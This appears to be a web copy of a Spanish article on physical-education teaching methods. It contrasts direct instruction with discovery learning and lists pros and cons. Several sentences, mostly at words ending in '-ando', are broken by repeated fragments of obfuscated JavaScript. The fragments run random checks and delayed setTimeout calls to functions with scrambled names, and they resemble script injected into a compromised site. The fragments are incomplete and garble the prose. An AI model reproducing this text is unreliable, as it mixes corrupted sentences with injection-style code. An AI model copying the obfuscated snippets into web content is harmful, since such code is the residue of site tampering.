¿QUÉ MÉTODO UTILIZAR EN LA ENSEÑANZA PARA LA EDUCACIÓN FÍSICA?

Autora: Milagros García Habernau

INTRODUCCIÓN

          Existe confusión terminológica por no haber una unidad de criterio entre autores para definir conceptos como “método”, “estrategia”; por eso se va  a hacer una aclaración según M.A. Delgado (92).


           “Método” y “estrategia” son dos términos que hacen referencia a los procedimientos utilizados para conseguir unos objetivos. Pero “método”, cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando nos referimos de forma general a la manera o modo de conducir la enseñanza, es un planteamiento general del proceso de enseñanza que define todos ellos: información inicial, agrupamientos, el protagonismo del profesor, utilización del material, tiempo de práctica, evaluación… El método engloba al estilo, que es el modo o forma que adoptan las relaciones didácticas entre los elementos personales del proceso educativo, tanto a nivel técnico y comunicativo como a nivel de organización de la clase y relaciones afectivas (mandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando directo, resolución de problemas, libre exploración, etc.).


           Las tendencias actuales en cuanto a métodos de enseñanza para la Educación Física se encuadran en las teorías del aprendizaje. En ellas podemos distinguir dos grupos:


           Teorías conexionistas: La primera tendencia es la reproducción de modelos, que arranca de las Teorías conductistas y neoconductistas de Skinner, Thorndige, Paulov, que explicaban el aprendizaje motor como el resultado de conexiones entre estímulo- respueta. En ellas se proponen unas enseñanzas en las que se minimizan las posibilidades de error, de forma que el alumno tenga un refuerzo positivo continuo. Centran su atención en el resultado. Se enmarcará la enseñanza con el método de instrucción directa.


          Teorías cognitivas: proponen una enseñanza mediante el ensayo error, centrandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando su atención en el proceso y no tanto en el resultado, ya que consideran que el error también enseña y hace a los sujetos más independientes. Se aproxima más al aprendizaje por descubrimiento.


 

DESARROLLO

          El método de instrucción directa y el aprendizaje por descubrimiento se van a explicar cada una de ellas en más profundidad.

  •  Instrucción directa:

          Según Sánchez Bañuelos, el profesor utiliza una instrucción directa cuandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando, ante la necesidad de enseñar la ejecución eficiente de determinadas tareas, proporciona al alumno una información directa, concretándole cómo debe realizar su ejecución Este método se basa en dos premisas fundamentales: La enseñanza de una solución fiable y bien definida al problema y la comunicación al alumno, por parte del profesor, de esa solución.


           La enseñanza mediante instrucción directa pone especial interés en los resultados, en detrimento del proceso, relacionándose más directamente con los métodos de aprendizaje “sin error”, siendo de gran utilidad en la enseñanza de los deportes.


          Una vez expuesta de forma teórica los fundamentos de la instrucción directa se va a tratar de reflexionar sobre sus ventajas e inconvenientes:

 Ventajas:

  • Es motivante para el alumno por lo que para él representa, asemejarse a un modelo, al que, en principio, respeta
  • Refuerza el papel del maestro
  • Es muy útil para el aprendizaje de gestos técnicos
  • Educar valores universales, no en valores humanos, etc

Inconvenientes:

  • Presupone que el maestro domina todas las disciplinas
  • Erige al profesor como protagonista de cada sesión, coartandom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($vTB$I_919AeEAw2z$KX(0), delay);}ando la creatividad y las aplicaciones positivas que tiene la intervención del alumno activamente en el aula
  • Si el maestro falla el alumno fallará
  • No parece excesivamente útil para aprendizaje de gestos no técnicos

(Tres estilos participativos: facilita la labor del profesor, produce un aprendizaje más eficaz, implica más a los alumnos en el aprendizaje, mayor libertad al alumno hacia la independencia y la autonomía)


 

  • Enseñanza mediante la búsqueda:

          Es un método de enseñanza centrado en el alumno, contraponiéndose así a los métodos que se centran fundamentalmente en el profesor. Se da una mayor participación del alumno en la enseñanza, una mayor contribución a la individualización y emancipación del mismo.